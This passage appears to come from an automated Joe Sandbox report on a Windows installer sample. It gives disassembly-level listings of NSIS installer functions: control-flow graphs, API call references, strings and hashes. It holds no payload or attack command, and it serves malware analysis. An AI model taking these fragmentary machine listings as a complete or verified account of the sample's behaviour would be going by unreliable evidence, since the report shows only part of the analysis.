37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00405196
                                                                                                                                                  • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                                                                                    • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                                                                                  • ShowWindow.USER32(00000008), ref: 00405333
                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                                                                                  • CreatePopupMenu.USER32 ref: 00405376
                                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                                                                                  • EmptyClipboard.USER32 ref: 00405411
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                                                                                  • CloseClipboard.USER32 ref: 0040546E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                  • String ID: @rD$New install of "%s" to "%s"${
                                                                                                                                                  • API String ID: 2110491804-2409696222
                                                                                                                                                  • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                                                                                                  • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                                                                                  • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                                                                                                  • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                                                                                                  Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                                                                                                  APIs
                                                                                                                                                  • #17.COMCTL32 ref: 004038A2
                                                                                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                                                                                    • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                    • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                    • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                  • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                  • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                                                                                  • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                                                                                  • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                                                                                  • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                                                                                  • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                                                                                  • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                                                                                  • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                                                                                  • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                                                                                  • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                                                                                  • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                                                                                  • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                  • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                                                                                  • API String ID: 2435955865-239407132
                                                                                                                                                  • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                                                                  • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                                                                                  • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                                                                  • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                                                                                                                                  Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 820 4074bb-4074c0 821 4074c2-4074ef 820->821 822 40752f-407547 820->822 824 4074f1-4074f4 821->824 825 4074f6-4074fa 821->825 823 407aeb-407aff 822->823 829 407b01-407b17 823->829 830 407b19-407b2c 823->830 826 407506-407509 824->826 827 407502 825->827 828 4074fc-407500 825->828 831 407527-40752a 826->831 832 40750b-407514 826->832 827->826 828->826 833 407b33-407b3a 829->833 830->833 836 4076f6-407713 831->836 837 407516 832->837 838 407519-407525 832->838 834 407b61-407c68 833->834 835 407b3c-407b40 833->835 851 407350 834->851 852 407cec 834->852 840 407b46-407b5e 835->840 841 407ccd-407cd4 835->841 843 407715-407729 836->843 844 40772b-40773e 836->844 837->838 839 407589-4075b6 838->839 847 4075d2-4075ec 839->847 848 4075b8-4075d0 839->848 840->834 845 407cdd-407cea 841->845 849 407741-40774b 843->849 844->849 850 407cef-407cf6 845->850 853 4075f0-4075fa 847->853 848->853 854 40774d 849->854 855 4076ee-4076f4 849->855 856 407357-40735b 851->856 857 40749b-4074b6 851->857 858 40746d-407471 851->858 859 4073ff-407403 851->859 852->850 862 407600 853->862 863 407571-407577 853->863 864 407845-4078a1 854->864 865 4076c9-4076cd 854->865 855->836 861 407692-40769c 855->861 856->845 866 407361-40736e 856->866 857->823 871 407c76-407c7d 858->871 872 407477-40748b 858->872 877 407409-407420 859->877 878 407c6d-407c74 859->878 867 4076a2-4076c4 861->867 868 407c9a-407ca1 861->868 880 407556-40756e 862->880 881 407c7f-407c86 862->881 869 40762a-407630 863->869 870 40757d-407583 863->870 864->823 873 407c91-407c98 865->873 874 4076d3-4076eb 865->874 866->852 882 407374-4073ba 866->882 867->864 868->845 883 40768e 869->883 884 407632-40764f 869->884 870->839 870->883 871->845 879 40748e-407496 872->879 873->845 874->855 885 407423-407427 877->885 878->845 879->858 889 407498 879->889 880->863 881->845 887 4073e2-4073e4 882->887 888 4073bc-4073c0 882->888 883->861 890 407651-407665 884->890 891 407667-40767a 884->891 885->859 886 407429-40742f 885->886 893 407431-407438 886->893 894 407459-40746b 886->894 897 4073f5-4073fd 887->897 898 4073e6-4073f3 887->898 895 4073c2-4073c5 GlobalFree 888->895 896 4073cb-4073d9 GlobalAlloc 888->896 889->857 892 40767d-407687 890->892 891->892 892->869 899 407689 892->899 900 407443-407453 GlobalAlloc 893->900 901 40743a-40743d GlobalFree 893->901 894->879 895->896 896->852 902 4073df 896->902 897->885 898->897 898->898 904 407c88-407c8f 899->904 905 40760f-407627 899->905 900->852 900->894 901->900 902->887 904->845 905->869
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                  • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                                                                                  • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                  • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                                                                                  Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                  • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 310444273-0
                                                                                                                                                  • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                  • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                                                                                  • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                  • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                                                                                  Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                  • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                  • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                                                                                  • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                  • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                                                                                                                                  Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                                                                                                  APIs
                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                                                                                  • ShowWindow.USER32(?), ref: 004054D2
                                                                                                                                                  • DestroyWindow.USER32 ref: 004054E6
                                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00405757
                                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                                                                                  • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
